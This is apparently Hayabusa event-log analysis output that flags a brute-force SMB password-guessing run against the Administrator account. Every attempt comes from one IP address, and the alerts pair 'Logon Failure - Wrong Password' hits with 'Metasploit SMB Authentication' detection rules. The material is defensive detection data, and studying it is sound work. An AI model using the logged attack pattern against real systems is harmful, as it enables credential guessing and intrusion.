17112016-09-20 01:50:20.173 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17122016-09-20 01:50:20.215 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17132016-09-20 01:50:20.215 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYlZwLsvrsuqUZ4q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvGrzr30eVl5TGhA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tqdJcHWbdGcIIHBr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDt69bIJ1yI6PXLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WtE2uMuOe8QPAKOj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BWQDlZDgFj9NmMhJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncQiyLyHCXr8knGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XjVmLfmcPMYbmdin : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gU2HjzjDxHsnvENI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cUPn5CEz2LtwRwvZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCz069oBFXqpshbU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dzhc9PVRVP69tshD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
